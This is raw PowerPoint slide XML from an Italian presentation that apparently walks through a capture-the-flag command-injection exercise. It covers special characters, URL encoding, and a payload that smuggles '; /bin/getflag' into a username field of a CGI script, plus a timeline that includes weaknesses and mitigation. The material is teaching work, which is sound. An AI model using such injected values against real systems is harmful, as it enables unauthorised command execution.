                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%2F</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E966073D-FFC1-E18F-588D-0897568E828D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2067308" y="2403418"/>
            <a:ext cx="4836749" cy="62377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0" indent="0" algn="ctr">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Nel comando che abbiamo digitato sono stati usati questi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00CFBE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>due caratteri speciali:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F0D28C0-715B-451D-9031-98A09854CA50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5228062" y="3107689"/>
            <a:ext cx="2315497" cy="35797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0" indent="0" algn="ctr">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CARATTERE «/»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31812288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xEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26">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6">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26">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xEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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xEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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5">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="0" end="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1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">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
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>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6">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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6">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="54"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450" name="Google Shape;1450;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408693" y="499658"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>url encoding</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Google Shape;1469;p54"/>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4"/>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4"/>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1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{877D37DB-FB3A-72A7-5ABB-F02B538D2D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="1152850"/>
            <a:ext cx="7578315" cy="56048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152400" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Quindi l’input da inviare allo script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> da:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username= « user; /bin/getflag »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{240EAD4B-4D31-C3F2-2B43-210E2F6064EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="3159" b="25717"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013478" y="3007859"/>
            <a:ext cx="7106642" cy="928254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D071CB45-0507-A415-1385-BC06227214A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777641" y="1805179"/>
            <a:ext cx="7578315" cy="64458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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>diventa:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user%3B%2Fbin%2Fgetflag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A0860FC-8246-1725-B771-E3F9585AFBC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690446" y="2263749"/>
            <a:ext cx="7578315" cy="37202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152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>E otteniamo il seguente output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234153738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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8">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xEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>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47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3348" name="Google Shape;3348;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="463173"/>
            <a:ext cx="77040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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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TIMELINE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3350" name="Google Shape;3350;p79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649144"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3351" name="Google Shape;3351;p79"/>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9"/>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9"/>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4" name="Google Shape;3354;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809138" y="3051774"/>
            <a:ext cx="1711200" cy="63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latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:rPr>
              <a:t>Descrizione del problema</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand"/>
              <a:ea typeface="Quicksand"/>
              <a:cs typeface="Quicksand"/>
              <a:sym typeface="Quicksand"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3355" name="Google Shape;3355;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809138" y="2452040"/>
            <a:ext cx="1711200" cy="42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chemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>FASE 1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Bebas Neue"/>
              <a:ea typeface="Bebas Neue"/>
              <a:cs typeface="Bebas Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3356" name="Google Shape;3356;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2715688" y="2944198"/>
            <a:ext cx="1711200" cy="638700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:rPr>
              <a:t>Soluzione</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand"/>
              <a:ea typeface="Quicksand"/>
              <a:cs typeface="Quicksand"/>
              <a:sym typeface="Quicksand"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3357" name="Google Shape;3357;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2715688" y="2453392"/>
            <a:ext cx="1711200" cy="42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chemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>FASE 2</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Bebas Neue"/>
              <a:ea typeface="Bebas Neue"/>
              <a:cs typeface="Bebas Neue"/>
              <a:sym typeface="Bebas Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3358" name="Google Shape;3358;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610455" y="2944198"/>
            <a:ext cx="1795800" cy="638700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:rPr>
              <a:t>Debolezze</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand"/>
              <a:ea typeface="Quicksand"/>
              <a:cs typeface="Quicksand"/>
              <a:sym typeface="Quicksand"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3359" name="Google Shape;3359;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610455" y="2452941"/>
            <a:ext cx="1795800" cy="42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chemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>FASE 3</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Bebas Neue"/>
              <a:ea typeface="Bebas Neue"/>
              <a:cs typeface="Bebas Neue"/>
              <a:sym typeface="Bebas Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3360" name="Google Shape;3360;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6587113" y="2944198"/>
            <a:ext cx="1795800" cy="63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12700" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en">
                <a:sym typeface="Quicksand"/>
              </a:rPr>
              <a:t>Mitigazione</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="Quicksand"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
